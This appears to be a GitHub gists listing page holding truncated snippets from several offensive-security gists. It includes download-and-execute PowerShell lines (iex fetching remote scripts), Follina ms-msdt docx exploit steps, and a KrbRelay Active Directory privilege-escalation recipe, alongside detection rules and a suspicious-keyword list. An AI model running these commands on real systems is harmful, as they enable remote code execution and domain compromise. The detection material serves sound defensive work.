This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# To use the function, call it like this: | |
# iex(new-object net.webclient).downloadstring("https://gist.githubusercontent.com/LuemmelSec/208b8ba52b645ec189031d2b5200f76e/raw/c6c1008da1b5670d3fb549578968c2a2f086a00b/Get-SPVersionInfo.ps1") | |
# Get-SPVersionInfo -ServerUrl "https://my-sharepointserver" | |
function Get-SPVersionInfo { | |
param ( | |
[string]$ServerUrl, | |
[switch]$SkipCertificateCheck, # Flag to skip certificate checks | |
[switch]$SkipHttpErrorCheck # Flag to skip HTTP error handling | |
) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Source: System.Management.Automation.dll | |
# This list is used to determin if a ScriptBlock contains potential suspicious content | |
# If a match is found an automatic 4104 with a "warning" level is generated. | |
# https://github.com/PowerShell/PowerShell/blob/master/src/System.Management.Automation/engine/runtime/CompiledScriptBlock.cs | |
- "Add-Type" | |
- "AddSecurityPackage" | |
- "AdjustTokenPrivileges" | |
- "AllocHGlobal" | |
- "BindingFlags" | |
- "Bypass" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <Windows.h> | |
#include <winternl.h> | |
#pragma comment(linker, "/ENTRY:entry") | |
// Define hashing algorithm to use | |
#define HASHALGO HashStringDjb2 | |
// Define how large you'd like cache to be | |
#define CACHE 50 |
MS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme "ms-msdt:" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters).
The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).
Here are the steps to build a Proof-of-Concept docx:
- Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
title: Sysmon Office MSDT | |
id: c95ed569-5da4-48b3-9698-5e429964556c | |
description: Detects MSDT Exploit Attempts | |
status: experimental | |
author: kevthehermit | |
date: 2022/05/30 | |
references: | |
- https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon | |
- https://gist.github.com/kevthehermit/5c8d52af388989cfa0ea38feace977f2 | |
logsource: |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{ | |
"SliverExtension" :{ | |
"prefix": "sliverext", | |
"body": [ "{", | |
"\"name\": \"$1\",", | |
"\"version\": \"0.0.0\",", | |
"\"command_name\": \"$2\",", | |
"\"extension_author\": \"$3\",", | |
"\"original_author\": \"$3\",", | |
"\"repo_url\": \"N/A\",", |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
iex(curl https://raw.githubusercontent.com/samratashok/ADModule/master/Import-ActiveDirectory.ps1 -UseBasicParsing ) | |
Import-ActiveDirectory | |
Set-ADComputer WIN-JQTB1UHHF2S -ServicePrincipalNames @{REPLACE="HOST/WIN-JQTB1UHHF2S","RestrictedKrbHost/WIN-JQTB1UHHF2S"} -Verbose | |
#in my testing i had to set dnshostname to $null first | |
Set-ADComputer WIN-JQTB1UHHF2S -DNSHostName $null | |
Set-ADComputer WIN-JQTB1UHHF2S -DNSHostName dc1.batcave.local |
Short HOWTO about one use case of the work from Cube0x0 (KrbRelay) and others.
No-Fix Local Privilege Escalation from low-priviliged domain user to local system on domain-joined computers.
Prerequisites:
- LDAP signing not required on Domain Controller (default!)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# CVE-2021-44142 PoC Samba 4.15.0 OOB Read/Write | |
# (C) 2022 - 0xSha.io - @0xSha | |
# This PoC is un-weaponized and for educational purposes only . | |
# To learn how to use the PoC please read the writeup : | |
# https://0xsha.io/blog/a-samba-horror-story-cve-2021-44142 | |
# requires samba4-python | |
# Refrences : | |
# https://www.thezdi.com/blog/2022/2/1/cve-2021-44142-details-on-a-samba-code-execution-bug-demonstrated-at-pwn2own-austin | |
# Patch : https://attachments.samba.org/attachment.cgi?id=17092 |
NewerOlder